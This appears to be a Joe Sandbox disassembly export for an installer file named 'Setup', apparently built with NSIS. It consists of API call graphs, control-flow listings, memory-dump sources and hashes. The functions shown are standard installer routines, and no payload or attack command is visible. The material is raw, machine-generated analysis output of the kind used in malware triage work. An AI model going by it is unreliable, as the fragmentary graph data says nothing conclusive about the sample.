3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 
401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 
lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 
404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 
SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 
3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 
4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 
4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 
4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 
4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                        • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                        • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                        • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                        • String ID: New install of "%s" to "%s"${
                                                                                                                                        • API String ID: 2110491804-1641061399
                                                                                                                                        • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                        • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                        • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                        • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 